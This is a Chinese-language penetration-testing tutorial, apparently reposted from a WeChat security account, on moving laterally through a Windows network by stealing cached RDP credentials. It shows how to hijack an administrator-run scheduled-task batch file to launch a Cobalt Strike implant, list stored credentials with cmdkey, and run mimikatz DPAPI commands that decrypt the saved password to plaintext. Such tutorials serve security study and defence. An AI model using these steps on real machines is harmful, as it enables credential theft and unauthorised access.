内网横向之RDP缓存利用

admin 2025年3月18日21:50:45评论4 views字数 1013阅读3分22秒阅读模式

RDP(远程桌面协议)在连接过程中会缓存凭据,尤其是在启用了 "保存密码" 或 "凭据管理器" 功能时。这个缓存的凭据通常是用于自动填充和简化后续连接的过程。凭据一般包含了用户的用户名和密码信息,或者是经过加密的身份验证令牌

内网横向之RDP缓存利用内网横向之RDP缓存利用

所以我们想登录这个rdp缓存,就是先找到凭证,再通过mimikatz来解密凭证,获取明文

0x01  以administrator权限上线

WIN+R   输入taskschd.msc

打开任务计划程序

内网横向之RDP缓存利用

找到批处理文件(.bat) 是Administrator创建的,找到他的目录

内网横向之RDP缓存利用

写入cs马子 

内网横向之RDP缓存利用

后在任务计划程序运行net.bat

内网横向之RDP缓存利用

就成功上线了

内网横向之RDP缓存利用

注意:不是说找到一个由administrator创建的.bat文件就行,而是说在计划任务中,这个由administrator创建的.bat可以以administrator的身份去运行。

0X02  找到RDP凭据

用administrator权限来执行下面的命令

cmdkey /list

内网横向之RDP缓存利用

发现存在凭证后

再用里面的文件浏览功能

内网横向之RDP缓存利用

之后找到下面的凭据内网横向之RDP缓存利用

再次说明,这个凭据是因为administrator在RDP其他主机的时候,选择了记住我的凭证功能,然后在本地保留了一个凭证

0x03 获取guidMasterKey

privilege::debug
dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentialsF18D03964B3469BAEA4542A7792D663B

内网横向之RDP缓存利用

0x04  获取MasterKey对应的

privilege::debug 
sekurlsa::dpapi

内网横向之RDP缓存利用

0x05 拿MasterKey进行解密

 mimikatz dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentialsF18D03964B3469BAEA4542A7792D663B /masterkey:2af578e7d889e691901422cabdd559e42d0a03882073e7ca46abc03422547ec7108113dc8928326cc181c69b6eff2fa7d87a06254474f0a892f9c183d56aae55
内网横向之RDP缓存利用

找到明文密码 就可以登录,达到横向移动->RDP的渗透手法

内网横向之RDP缓存利用
作者:【J0J0】

原文始发于微信公众号(船山信安):内网横向之RDP缓存利用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月18日21:50:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网横向之RDP缓存利用https://cn-sec.com/archives/3835840.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息